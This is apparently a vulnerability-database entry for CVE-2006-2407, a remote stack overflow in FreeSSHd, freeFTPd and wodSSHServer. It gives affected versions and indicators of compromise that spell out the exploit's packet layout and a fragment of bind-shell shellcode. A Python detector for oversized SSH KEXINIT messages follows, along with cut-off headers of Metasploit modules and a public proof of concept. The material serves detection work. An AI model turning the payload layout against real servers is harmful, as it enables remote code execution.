CVE-2006-2407
Published 2006-05-16
Priority: P2 · 62 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 71.38% (99.3rd percentile)
Stack-based buffer overflow in (1) WeOnlyDo wodSSHServer ActiveX Component 1.2.7 and 1.3.3 DEMO, as used in other products including (2) FreeSSHd 1.0.9 and (3) freeFTPd 1.0.10, allows remote attackers to execute arbitrary code via a long key exchange algorithm string.
Affected (4 ranges; versions as named in the CVE description, no fixed version recorded)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freeftpd | freeftpd | 1.0.10 | — |
| freesshd | freesshd | 1.0.9 | — |
| weonlydo | wodsshserver | 1.2.7 | — |
| weonlydo | wodsshserver | 1.3.3 DEMO | — |
Detection & IOCs (extracted from sources)
- bytes: `SSH-2.0-OpenSSH_3.9p1\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde + 1055 bytes + ret + payload + 19000 bytes + \r\n`
- bytes (the leading hex decodes to the banner `SSH-1.99-OpenSSH_3.4\n`): `\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde + A*1055 + eip + yyyy + \x90*4 + shellcode + B*19021 + \r\n`
- bytes: `win32_bind shellcode: \xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24...`
- The exploit sends a fake client banner ('SSH-2.0-OpenSSH_3.9p1' in one public exploit, 'SSH-1.99-OpenSSH_3.4' in the second byte layout above) followed by a KEXINIT whose key exchange algorithm name-list is ~1055+ bytes, on TCP port 22. The banner is attacker-chosen, so detect on the oversized SSH_MSG_KEXINIT rather than on the client version string.
- Vulnerable servers identify themselves with the banner 'SSH-2.0-WeOnlyDo-wodFTPD 2.1.8.98' (freeFTPd) or 'SSH-2.0-WeOnlyDo 1.2.7' (freeSSHd); use these banners to fingerprint exposed vulnerable services.
- Successful exploitation opens a bind shell on TCP port 1977 on the victim; monitor for unexpected listening services on that port following SSH connection attempts.
- The exploit places the fixed byte sequence \x00\x00\x4f\x04\x05\x14 immediately after the banner newline. Decoded as an SSH binary packet header this is packet_length 0x00004f04 (20228 bytes), padding_length 5, message type 0x14 (SSH_MSG_KEXINIT); it can be used as a network signature within the first ~50 bytes of the client side of the handshake.
- The overflow needs exactly 1055 bytes of filler before the return address, and the name-list length field declares 0x07de (2014) bytes; a client KEXINIT whose key exchange algorithm name-list exceeds ~1055 bytes is a strong indicator of exploitation (legitimate lists are a few hundred bytes, and RFC 4251 caps each algorithm name at 64 characters).
- The Metasploit module only attempts exploitation if the server banner matches the specific vulnerable version strings; non-matching banners cause the module to abort without sending the overflow payload.
- Return addresses (RET values) are hardcoded per OS/SP target; the exploit will fail or crash the service if the wrong target is selected, so detection based on crash events should account for failed attempts.
- The standalone Python PoC (exploit-db 1787) notes that the shell may not be obtained on the first attempt and recommends retrying; detection logic should account for repeated connection attempts from the same source IP to port 22.
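As an added example (not code from this page's sources, the Exploit-DB PoC or the Metasploit modules), the following Python parses the client side of an SSH handshake (identification string plus the first binary packet) and applies the indicators listed above: the fixed six-byte header, the oversized kex_algorithms name-list, and RFC 4251's rule that algorithm names are printable US-ASCII of at most 64 bytes. It also fingerprints server banners against the two vulnerable version strings. The 1024-byte alert threshold, the benign KEXINIT built by build_kexinit, and the exploit-shaped fixture are assumptions constructed for the example; the bytes in the fixture's return-address and shellcode slots are inert placeholders, not the exploit's values.

```python
import struct

SSH_MSG_KEXINIT = 20
RFC4251_MAX_NAME_LEN = 64
KEX_NAMELIST_ALERT_BYTES = 1024   # assumed threshold; exploit declares 0x07de = 2014, overflow needs 1055+

# Server banners the Metasploit module requires before firing (from the IOC list above).
VULNERABLE_SERVER_BANNERS = ("SSH-2.0-WeOnlyDo-wodFTPD 2.1.8.98", "SSH-2.0-WeOnlyDo 1.2.7")

# Six bytes both public exploits send right after the banner newline, decoded as a binary
# packet header: packet_length 0x00004f04 (20228), padding_length 5, msg type 0x14 = KEXINIT.
EXPLOIT_PACKET_HEADER = b"\x00\x00\x4f\x04\x05\x14"


def server_banner_is_vulnerable(banner: bytes) -> bool:
    """Fingerprint a server identification line against the known-vulnerable banners."""
    line = banner.split(b"\n", 1)[0].rstrip(b"\r").decode("ascii", "replace")
    return line in VULNERABLE_SERVER_BANNERS


def parse_client_hello(data: bytes) -> dict:
    """Identification string plus the first binary packet (RFC 4253 s6: uint32 packet_length,
    byte padding_length, payload). A KEXINIT payload is byte 20, a 16-byte cookie, then the
    kex_algorithms name-list (uint32 length + bytes)."""
    nl = data.find(b"\n")
    if nl < 0 or not data.startswith(b"SSH-"):
        raise ValueError("no SSH identification string")
    pkt = data[nl + 1:]
    if len(pkt) < 6:
        raise ValueError("truncated binary packet header")
    packet_length, padding_length, msg_type = struct.unpack("!IBB", pkt[:6])
    info = {"client_ident": data[:nl].rstrip(b"\r").decode("ascii", "replace"),
            "raw_header": pkt[:6], "packet_length": packet_length,
            "padding_length": padding_length, "msg_type": msg_type,
            "kex_namelist_len": None, "kex_namelist": b""}
    if msg_type == SSH_MSG_KEXINIT and len(pkt) >= 26:
        (n,) = struct.unpack("!I", pkt[22:26])          # 6-byte header + 16-byte cookie
        info["kex_namelist_len"], info["kex_namelist"] = n, pkt[26:26 + n]
    return info


def namelist_violations(namelist: bytes) -> list:
    """RFC 4251 s6: names are printable US-ASCII, comma-separated, at most 64 bytes each."""
    out = []
    if any(b < 0x21 or b > 0x7e for b in namelist):
        out.append("name-list contains non-printable or non-ASCII bytes")
    longest = max((len(n) for n in namelist.split(b",")), default=0)
    if longest > RFC4251_MAX_NAME_LEN:
        out.append(f"algorithm name of {longest} bytes exceeds the RFC 4251 limit of 64")
    return out


def detect_kexinit_overflow(data: bytes) -> list:
    """Reasons a client hello matches the CVE-2006-2407 exploit shape (empty list = clean)."""
    try:
        info = parse_client_hello(data)
    except ValueError as e:
        return [f"unparseable: {e}"]
    if info["msg_type"] != SSH_MSG_KEXINIT:
        return []
    reasons = []
    if info["raw_header"] == EXPLOIT_PACKET_HEADER:
        reasons.append("fixed exploit header \\x00\\x00\\x4f\\x04\\x05\\x14 after banner")
    n = info["kex_namelist_len"]
    if n is not None and n > KEX_NAMELIST_ALERT_BYTES:
        reasons.append(f"kex_algorithms name-list declares {n} bytes (> {KEX_NAMELIST_ALERT_BYTES})")
    reasons.extend(namelist_violations(info["kex_namelist"]))
    return reasons


def build_kexinit(kex_algorithms: bytes, cookie: bytes = b"\x00" * 16) -> bytes:
    """Frame a well-formed minimal SSH_MSG_KEXINIT (RFC 4253 s7.1) as a benign control case."""
    def namelist(s: bytes) -> bytes:
        return struct.pack("!I", len(s)) + s
    payload = bytes([SSH_MSG_KEXINIT]) + cookie + namelist(kex_algorithms)
    for s in (b"ssh-rsa", b"aes128-ctr", b"aes128-ctr", b"hmac-sha1", b"hmac-sha1",
              b"none", b"none", b"", b""):                # host key, enc, mac, comp, lang lists
        payload += namelist(s)
    payload += b"\x00" + b"\x00\x00\x00\x00"              # first_kex_packet_follows, reserved
    padding = 8 - (5 + len(payload)) % 8                  # whole packet a multiple of 8 bytes,
    padding += 8 if padding < 4 else 0                    # with at least 4 bytes of padding
    return struct.pack("!IB", 1 + len(payload) + padding, padding) + payload + b"\x00" * padding


def constructed_exploit_shaped_hello() -> bytes:
    """Constructed fixture with the wire layout quoted in the IOC list: banner, fixed header,
    zero cookie, 0x07de length, 1055 filler bytes, then the slots the exploit fills with a
    return address, NOP sled and shellcode. The slot contents here are inert placeholders."""
    head = EXPLOIT_PACKET_HEADER + b"\x00" * 16 + b"\x00\x00\x07\xde"
    body = b"A" * 1055 + b"\xef\xbe\xad\xde" + b"yyyy" + b"\x90" * 4 + b"\xcc" * 64
    return b"SSH-1.99-OpenSSH_3.4\n" + head + body + b"B" * 19021 + b"\r\n"


if __name__ == "__main__":
    benign = b"SSH-2.0-OpenSSH_8.9\r\n" + build_kexinit(b"curve25519-sha256,diffie-hellman-group14-sha256")
    for label, hello in (("benign", benign), ("exploit-shaped", constructed_exploit_shaped_hello())):
        print(label, parse_client_hello(hello)["client_ident"], detect_kexinit_overflow(hello) or "clean")
```

Run stand-alone it prints one verdict per fixture; in a sensor the detect function would be fed the first few hundred reassembled bytes of each inbound TCP/22 flow, and the banner check the first line the server sends back. The name-length and printable-ASCII checks matter because a later variant of the exploit can change the banner and the padding count but cannot make a 1055-byte run of filler plus a NOP sled look like a comma-separated list of algorithm names.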
No detection rules found.
Exploit-DB (exploitdb · 2010-05-09): freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: freeftpd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# (class header restored: the original text between '<' and the first '>' was lost)
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
      'Description' => %q{
          This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10
          This flaw is due to a buffer overflow error when handling a specially
          crafted key exchange algorithm string received from an SSH client.
          This module is based on MC's freesshd_key_exchange expl
```
Exploit-DB (exploitdb · 2010-05-09): freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# (class header restored: the original text between '<' and the first '>' was lost)
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
      'Description' => %q{
          This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.
          This flaw is due to a buffer overflow error when handling a specially
          crafted key exchange algorithm string received from an SSH client.
      },
      'Author'      => 'MC',
      'License'     => MSF_LICENSE,
      'Version'
```
Exploit-DB (exploitdb · 2006-05-15): freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
---
```python
#!/usr/bin/env python
"""
Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
ahmadtauqeer[at]yahoo.com

Disclaimer: This Proof of concept exploit is for educational purpose only.
Please do not use it against any system without prior permission.
You are responsible for yourself for what you do with this code.

Greetings: All the Pakistani White Hats including me ;)
Flames: To all the skript kiddies out there. Man, grow up!

Code tested against freeSSHd version 1.0.9
If you didn't get shell at first try, try a few times and you will get lucky

Advisories:
https://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786
"""

import socket
import getopt
import sys

host = "192.168.0.2"
port = 0
eip = ""

#/* win32_bi
```
Metasploit: FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This module is based on MC's freesshd_key_exchange exploit.
Metasploit: FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client.
No writeups or analysis indexed.
References
- http://marc.info/?l=full-disclosure&m=114764338702488&w=2
- http://secunia.com/advisories/19845
- http://secunia.com/advisories/19846
- http://secunia.com/advisories/20136
- http://securityreason.com/securityalert/901
- http://www.kb.cert.org/vuls/id/477960
- http://www.osvdb.org/25463
- http://www.osvdb.org/25569
- http://www.securityfocus.com/archive/1/434007/100/0/threaded
- http://www.securityfocus.com/archive/1/434038/100/0/threaded
- http://www.securityfocus.com/archive/1/434402/100/0/threaded
- http://www.securityfocus.com/archive/1/434415/100/0/threaded
- http://www.securityfocus.com/archive/1/434415/30/4920/threaded
- http://www.securityfocus.com/bid/17958
- http://www.vupen.com/english/advisories/2006/1785
- http://www.vupen.com/english/advisories/2006/1786
- http://www.vupen.com/english/advisories/2006/1842
- https://exchange.xforce.ibmcloud.com/vulnerabilities/26442